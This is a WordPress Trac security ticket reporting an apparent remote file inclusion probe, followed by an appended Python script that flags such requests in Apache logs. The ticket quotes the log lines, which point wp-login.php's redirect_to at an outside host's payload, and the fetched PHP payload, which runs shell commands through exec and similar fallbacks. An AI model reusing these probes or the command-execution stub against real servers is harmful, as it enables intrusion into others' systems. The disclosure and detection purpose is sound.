[wp-trac] [WordPress Trac] #5548: Hacking attempt.
WordPress Trac
wp-trac at lists.automattic.com
Sat Dec 29 18:29:21 GMT 2007
#5548: Hacking attempt.
----------------------+-----------------------------------------------------
Reporter: mylesab | Owner: anonymous
Type: defect | Status: new
Priority: normal | Milestone: 2.5
Component: Security | Version:
Severity: normal | Keywords:
----------------------+-----------------------------------------------------
Today I noticed the following entries in my log:
{{{
80.238.208.61 - - [29/Dec/2007:12:18:14 -0600] "GET /blog/archives/2006/microid-wordpress-plugin//wp-login.php?redirect_to=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2066 "-" "libwww-perl/5.805"
80.238.208.61 - - [29/Dec/2007:12:18:14 -0600] "GET //wp-login.php?redirect_to=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2015 "-" "libwww-perl/5.805"
80.238.208.61 - - [29/Dec/2007:12:18:15 -0600] "GET /blog/archives/2006//wp-login.php?redirect_to=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2041 "-" "libwww-perl/5.805"
}}}
When I curled the `id.txt` file, I got the following:
{{{
<?php
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;
function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}
exit;
}}}
--
Ticket URL: <http://trac.wordpress.org/ticket/5548>
WordPress Trac <http://trac.wordpress.org/>
WordPress blogging software
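As an added defender-side example (not part of the ticket, and not WordPress code), the script below parses Apache combined-format lines like the ones in the report and flags requests whose query parameters carry an absolute URL to a host the site does not own, which is the shape of this `redirect_to` probe. The first two sample lines are the ticket's own entries re-joined onto single lines; the third benign line, the `own_hosts` allowlist and all function names are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Two entries from the ticket plus one constructed benign login request.
SAMPLE_LOG = """\
80.238.208.61 - - [29/Dec/2007:12:18:14 -0600] "GET /blog/archives/2006/microid-wordpress-plugin//wp-login.php?redirect_to=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2066 "-" "libwww-perl/5.805"
80.238.208.61 - - [29/Dec/2007:12:18:14 -0600] "GET //wp-login.php?redirect_to=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 200 2015 "-" "libwww-perl/5.805"
203.0.113.5 - - [29/Dec/2007:12:20:00 -0600] "GET /blog/wp-login.php?redirect_to=/blog/wp-admin/ HTTP/1.1" 200 2000 "-" "Mozilla/5.0"
"""

# Apache "combined" log format, the layout of the entries in the ticket.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>\S+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
ABSOLUTE_URL_RE = re.compile(r'^[a-z][a-z0-9+.-]*://', re.IGNORECASE)
SCRIPTED_UA_RE = re.compile(r'libwww-perl', re.IGNORECASE)

def parse_line(line):
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def remote_url_params(target, own_hosts):
    """(parameter, host) for every query value that is an absolute URL pointing
    at a host outside own_hosts: the shape of an RFI / open-redirect probe."""
    # Split on the first '?' by hand: urlsplit() would read the probe's
    # leading '//wp-login.php' as a network location, not a path.
    _, _, query = target.partition('?')
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        if ABSOLUTE_URL_RE.match(value):
            host = (urlsplit(value).hostname or '').lower()
            if host not in own_hosts:
                hits.append((name, host))
    return hits

def triage(log_text, own_hosts=frozenset()):
    """One finding per suspicious line: source IP, request path, and why."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        reasons = [f"remote URL in parameter {name!r} -> {host}"
                   for name, host in remote_url_params(rec['target'], own_hosts)]
        if not reasons:
            continue  # a scripted user agent alone is too noisy to flag
        if SCRIPTED_UA_RE.search(rec['ua']):
            reasons.append('scripted client user agent')
        findings.append({'ip': rec['ip'], 'path': rec['target'].partition('?')[0],
                         'status': rec['status'], 'reasons': reasons})
    return findings
```

Run `triage(SAMPLE_LOG, own_hosts={'example.com'})` to get the two flagged entries; the status code is kept because a 200 here shows the probe was answered, not rejected.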